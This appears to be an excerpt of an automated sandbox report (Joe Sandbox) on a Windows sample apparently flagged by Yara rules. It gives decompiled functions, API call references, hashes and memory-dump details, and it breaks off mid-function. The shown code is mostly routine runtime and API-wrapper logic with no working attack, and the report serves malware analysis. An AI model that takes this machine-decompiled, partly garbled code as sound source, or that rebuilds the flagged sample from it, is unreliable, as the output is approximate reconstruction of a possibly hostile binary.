                        • Instruction ID: b94939cd9a20de2c40e5b0936aafe30322abe83aeacba9d68ad797e1460e56a0
                        • Opcode Fuzzy Hash: 896a0f2a9804b7cc9b542f646fc39b89f94c70de8e344e7d2b9837168f29a886
                        • Instruction Fuzzy Hash: A2F0A0B62012146FCB11DF45CC41EE73B699F46314F018596F90D57243D535E915C7B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A622 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 40%
                        			E0041A622(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				void* _t17;

				0x9433();
				asm("fidivr dword [ebp+0x55ce3c20]");
				_t9 = _a4;
				_t3 = _t9 + 0xc74; // 0xc74
				E0041AF20(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}





                        0x0041a624
                        0x0041a62b
                        0x0041a633
                        0x0041a63f
                        0x0041a647
                        0x0041a65d
                        0x0041a661

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 0d616628c167f1c377f5eb2043bc9643f064c628a8bfec2fef802906ef755510
                        • Instruction ID: 558fd1e1b32101dcb4a0f0fb8f4cc6f4991fda9ca6b5a7a5012df12808b698d8
                        • Opcode Fuzzy Hash: 0d616628c167f1c377f5eb2043bc9643f064c628a8bfec2fef802906ef755510
                        • Instruction Fuzzy Hash: 76E06DB1210308ABCB14EF95CC45EDB33A8AF88314F118545FD185B241C631E851CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0041A630(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                        0x0041a63f
                        0x0041a647
                        0x0041a65d
                        0x0041a661

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0041A790(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* _t8;
				int _t10;
				void* _t15;

				_t8 = E0041AF20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				 *_t8 =  *_t8 + _t8;
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}






                        0x0041a7aa
                        0x0041a7ad
                        0x0041a7c0
                        0x0041a7c4

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                        Download Yara Rule
                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A672 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                        Download Yara Rule
                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: f70bcf56cb69372f97621f00c904547e8f0c00941ce3998ab6fd1aa7f2f5f90f
                        • Instruction ID: c1221fc992dd787324de96086fbf26e93045d9467701d9422779042349688f23
                        • Opcode Fuzzy Hash: f70bcf56cb69372f97621f00c904547e8f0c00941ce3998ab6fd1aa7f2f5f90f
                        • Instruction Fuzzy Hash: FFD0A7716002007FD720DF68CC85FD73B68DF48354F018169B91CAB241C531EA01CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00407B1B Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1ea347f2521e7c9f7e1865d0014194ef56e2f18ef442dfa890a1e188c5055467
                        • Instruction ID: 6c5d6e8dee61ada36054c386bf8428c5d0431cf6645ade3b9aef6b44bc7017b5
                        • Opcode Fuzzy Hash: 1ea347f2521e7c9f7e1865d0014194ef56e2f18ef442dfa890a1e188c5055467
                        • Instruction Fuzzy Hash: 77C08032502405C5D5153F6D78501F4F768DF47634F001B97E8E493DE0A686C4514284
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040E472 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040E472(void* __eax, void* __edx) {
				signed int _t9;

				 *(__edx - 0x1b) =  *(__edx - 0x1b) ^ _t9;
				return __eax;
			}




                        0x0040e473
                        0x0040e480

                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e81cabe3ccf5af523a966cfde47bf896e8d276dbccfe718632209b2265fa5f4f
                        • Instruction ID: fc53ef27ae9d289d12e758ac6865afd34162bd1fc96e3f1f974efe5d1e462851
                        • Opcode Fuzzy Hash: e81cabe3ccf5af523a966cfde47bf896e8d276dbccfe718632209b2265fa5f4f
                        • Instruction Fuzzy Hash: 90B0122BF050088244248C5974410B4F330F283033E1132EBCD0CF35001413D11001CD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D738A8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E00D738A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				void** _t105;
				void** _t106;
				void** _t109;
				signed char _t111;
				long _t119;
				void* _t129;
				signed int* _t133;
				void* _t135;
				signed int* _t138;
				void** _t139;
				void* _t141;
				signed int _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xd82260);
				E00D72400(__ebx, __edi, __esi);
				E00D7442F(0xb);
				 *(_t155 - 4) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E00D74869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xd84848 = _t82;
					 *0xd850e4 = _t141;
					while(_t133 <  &(_t82[0x200])) {
						_t133[1] = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						_t133[2] = 0;
						_t133[9] = _t133[9] & 0x00000080;
						_t133[9] = _t133[9] & 0x0000007f;
						_t133[9] = 0xa0a;
						_t133[0xe] = 0;
						_t133[0xd] = 0;
						_t133 =  &(_t133[0x10]);
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xd84848; // 0x0
					}
					GetStartupInfoW(_t155 - 0x74);
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							if(_t142 >= 3) {
								break;
							}
							_t147 =  *0xd84848 + (_t142 << 6);
							 *(_t155 - 0x24) = _t147;
							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
								_t147[1] = 0x81;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								if(_t91 == 0xffffffff || _t91 == 0) {
									L45:
									_t147[1] = _t147[1] | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xd86100;
									if(_t94 != 0) {
										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
									}
									goto L47;
								} else {
									_t98 = GetFileType(_t91);
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									if(_t99 != 2) {
										if(_t99 != 3) {
											L44:
											_t71 =  &(_t147[3]); // -14174268
											E00D740A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											_t147[2] = _t147[2] + 1;
											goto L47;
										}
										_t103 = _t147[1] | 0x00000008;
										L43:
										_t147[1] = _t103;
										goto L44;
									}
									_t103 = _t147[1] | 0x00000040;
									goto L43;
								}
							} else {
								_t147[1] = _t147[1] | 0x00000080;
								L47:
								_t142 = _t142 + 1;
								continue;
							}
						}
						 *(_t155 - 4) = _t129;
						E00D73B53();
						_t86 = 0;
						L49:
						return E00D72445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 =  &(_t105[1]);
					 *(_t155 - 0x28) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					 *(_t155 - 0x30) = 1;
					while( *0xd850e4 < _t135) {
						_t138 = E00D74869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						if(_t138 != 0) {
							0xd84848[_t149] = _t138;
							 *0xd850e4 =  *0xd850e4 + _t141;
							while(_t138 <  &(0xd84848[_t149][0x200])) {
								_t138[1] = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								_t138[2] = 0;
								_t138[9] = _t138[9] & 0x00000080;
								_t138[9] = 0xa0a;
								_t138[0xe] = 0;
								_t138[0xd] = 0;
								_t138 =  &(_t138[0x10]);
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xd850e4;
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *(_t155 - 0x28);
					_t139 =  *(_t155 - 0x20);
					while(_t143 < _t135) {
						_t150 =  *_t139;
						if(_t150 == 0xffffffff || _t150 == _t129) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  &(( *(_t155 - 0x28))[0]);
							 *(_t155 - 0x28) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						} else {
							_t111 =  *_t109;
							if((_t111 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t111 & 0x00000008) != 0) {
								L20:
								_t154 = 0xd84848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								_t154[1] =  *( *(_t155 - 0x28));
								_t37 =  &(_t154[3]); // 0xd
								E00D740A2(_t37, 0xfa0, 0);
								_t156 = _t156 + 0xc;
								_t154[2] = _t154[2] + 1;
								_t139 =  *(_t155 - 0x20);
								L21:
								_t135 =  *(_t155 - 0x1c);
								goto L22;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							if(_t119 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L28;
				}
				_t86 = E00D72600(_t155, 0xd83400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                        0x00d738a8
                        0x00d738aa
                        0x00d738af
                        0x00d738b6
                        0x00d738be
                        0x00d738c1
                        0x00d738c5
                        0x00d738c6
                        0x00d738c7
                        0x00d738ce
                        0x00d738d0
                        0x00d738d5
                        0x00d738f2
                        0x00d738f7
                        0x00d738fd
                        0x00d73906
                        0x00d7390c
                        0x00d7390f
                        0x00d73912
                        0x00d7391b
                        0x00d7391e
                        0x00d73924
                        0x00d73927
                        0x00d7392a
                        0x00d7392d
                        0x00d73930
                        0x00d73930
                        0x00d7393b
                        0x00d73946
                        0x00d73a7b
                        0x00d73a7d
                        0x00d73a7e
                        0x00d73a7e
                        0x00d73a80
                        0x00d73a80
                        0x00d73a86
                        0x00000000
                        0x00000000
                        0x00d73a91
                        0x00d73a97
                        0x00d73a9d
                        0x00d73ab1
                        0x00d73ab7
                        0x00d73abe
                        0x00d73ac3
                        0x00d73ac5
                        0x00d73ab9
                        0x00d73abb
                        0x00d73abb
                        0x00d73ac9
                        0x00d73acf
                        0x00d73ad5
                        0x00d73b23
                        0x00d73b29
                        0x00d73b2c
                        0x00d73b2e
                        0x00d73b35
                        0x00d73b3a
                        0x00d73b3a
                        0x00000000
                        0x00d73adb
                        0x00d73adc
                        0x00d73ae4
                        0x00000000
                        0x00000000
                        0x00d73ae9
                        0x00d73aeb
                        0x00d73af3
                        0x00d73b00
                        0x00d73b0b
                        0x00d73b12
                        0x00d73b16
                        0x00d73b1b
                        0x00d73b1e
                        0x00000000
                        0x00d73b1e
                        0x00d73b06
                        0x00d73b08
                        0x00d73b08
                        0x00000000
                        0x00d73b08
                        0x00d73af9
                        0x00000000
                        0x00d73af9
                        0x00d73aa3
                        0x00d73aa9
                        0x00d73b3d
                        0x00d73b3d
                        0x00000000
                        0x00d73b3d
                        0x00d73a9d
                        0x00d73b43
                        0x00d73b46
                        0x00d73b4b
                        0x00d73b4d
                        0x00d73b52
                        0x00d73b52
                        0x00d7394c
                        0x00d73951
                        0x00000000
                        0x00000000
                        0x00d73957
                        0x00d73959
                        0x00d7395c
                        0x00d7395f
                        0x00d73964
                        0x00d7396e
                        0x00d73970
                        0x00d73972
                        0x00d73972
                        0x00d73977
                        0x00d73978
                        0x00d7397b
                        0x00d7398d
                        0x00d7398f
                        0x00d73994
                        0x00d73a2e
                        0x00d73a35
                        0x00d73a3b
                        0x00d73a4b
                        0x00d73a51
                        0x00d73a54
                        0x00d73a57
                        0x00d73a5b
                        0x00d73a61
                        0x00d73a64
                        0x00d73a67
                        0x00d73a6a
                        0x00d73a6a
                        0x00d73a6f
                        0x00d73a70
                        0x00d73a73
                        0x00000000
                        0x00d73a73
                        0x00d7399a
                        0x00d739a0
                        0x00000000
                        0x00d739a0
                        0x00d739a3
                        0x00d739a5
                        0x00d739aa
                        0x00d739ab
                        0x00d739ae
                        0x00d739b1
                        0x00d739b9
                        0x00d739be
                        0x00d73a1b
                        0x00d73a1b
                        0x00d73a1c
                        0x00d73a22
                        0x00d73a23
                        0x00d73a26
                        0x00d73a29
                        0x00000000
                        0x00d739c4
                        0x00d739c4
                        0x00d739c8
                        0x00000000
                        0x00000000
                        0x00d739cc
                        0x00d739dc
                        0x00d739e9
                        0x00d739f0
                        0x00d739f5
                        0x00d739fc
                        0x00d73a06
                        0x00d73a0a
                        0x00d73a0f
                        0x00d73a12
                        0x00d73a15
                        0x00d73a18
                        0x00d73a18
                        0x00000000
                        0x00d73a18
                        0x00d739cf
                        0x00d739d5
                        0x00d739da
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00d739da
                        0x00d739be
                        0x00000000
                        0x00d739b1
                        0x00d738ea
                        0x00000000

                        APIs
                        • __lock.LIBCMT ref: 00D738B6
                          • Part of subcall function 00D7442F: __mtinitlocknum.LIBCMT ref: 00D74441
                          • Part of subcall function 00D7442F: EnterCriticalSection.KERNEL32(00000000,?,00D737AB,0000000D), ref: 00D7445A
                        • __calloc_crt.LIBCMT ref: 00D738C7
                          • Part of subcall function 00D74869: __calloc_impl.LIBCMT ref: 00D74878
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D738E2
                        • GetStartupInfoW.KERNEL32(?,00D82260,00000064,00D71654,00D82190,00000014), ref: 00D7393B
                        • __calloc_crt.LIBCMT ref: 00D73986
                        • GetFileType.KERNEL32(00000001), ref: 00D739CF
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2772871689-0
                        • Opcode ID: eedce8d412bb233e26a2a556420ff0ae670e97df73ef385219ec3b4d94f6f218
                        • Instruction ID: 3b9319270afad973bf9a4d6e91ec7af8224983e9556176e32cd70dba36fc4022
                        • Opcode Fuzzy Hash: eedce8d412bb233e26a2a556420ff0ae670e97df73ef385219ec3b4d94f6f218
                        • Instruction Fuzzy Hash: FD81B2719043458FDB14CF68C8416A9BBF0EF19324B28826ED4AAEB391E734D942DB74
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D73815 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E00D73815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00D71890(_t3);
				if(E00D74560() != 0) {
					_t6 = E00D74001(E00D735A6);
					 *0xd8350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00D74869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00D7388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00D7405D( *0xd8350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00D73762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00D7388B();
					return 0;
				}
			}








                        0x00d73815
                        0x00d73821
                        0x00d73830
                        0x00d73835
                        0x00d7383b
                        0x00d7383e
                        0x00000000
                        0x00d73840
                        0x00d7384d
                        0x00d73851
                        0x00d73853
                        0x00d73882
                        0x00d73882
                        0x00d73887
                        0x00d7388a
                        0x00d73855
                        0x00d73863
                        0x00d73865
                        0x00000000
                        0x00d73867
                        0x00d73867
                        0x00d73869
                        0x00d7386a
                        0x00d73871
                        0x00d73877
                        0x00d7387b
                        0x00d7387f
                        0x00d73881
                        0x00d73881
                        0x00d73865
                        0x00d73853
                        0x00d73823
                        0x00d73823
                        0x00d73823
                        0x00d7382a
                        0x00d7382a

                        APIs
                        • __init_pointers.LIBCMT ref: 00D73815
                          • Part of subcall function 00D71890: EncodePointer.KERNEL32(00000000,?,00D7381A,00D7163A,00D82190,00000014), ref: 00D71893
                          • Part of subcall function 00D71890: __initp_misc_winsig.LIBCMT ref: 00D718AE
                          • Part of subcall function 00D71890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D74117
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D7412B
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D7413E
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D74151
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D74164
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D74177
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D7418A
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D7419D
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D741B0
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D741C3
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D741D6
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D741E9
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D741FC
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D7420F
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D74222
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D74235
                        • __mtinitlocks.LIBCMT ref: 00D7381A
                        • __mtterm.LIBCMT ref: 00D73823
                          • Part of subcall function 00D7388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00D73828,00D7163A,00D82190,00000014), ref: 00D7447A
                          • Part of subcall function 00D7388B: _free.LIBCMT ref: 00D74481
                          • Part of subcall function 00D7388B: DeleteCriticalSection.KERNEL32(00D83558,?,?,00D73828,00D7163A,00D82190,00000014), ref: 00D744A3
                        • __calloc_crt.LIBCMT ref: 00D73848
                        • __initptd.LIBCMT ref: 00D7386A
                        • GetCurrentThreadId.KERNEL32 ref: 00D73871
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                        • String ID:
                        • API String ID: 3567560977-0
                        • Opcode ID: 278c1f0dd0e93df5de4385ab4f058799a2bc60290f049d1f0ed56eec90eb9c6f
                        • Instruction ID: 162fec928960f12b415d3688e2dbec891a10202e2c4c5d94db79b42cea7b531f
                        • Opcode Fuzzy Hash: 278c1f0dd0e93df5de4385ab4f058799a2bc60290f049d1f0ed56eec90eb9c6f
                        • Instruction Fuzzy Hash: B9F096325193215EE32977787C1368A2A84CF01B30B24C76DF46CD81D2FF218A4156B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D712B0 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E00D712B0(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00D71530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00D72752(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00D71530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00D71CC3())) = 0x22;
												L4:
												E00D71E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
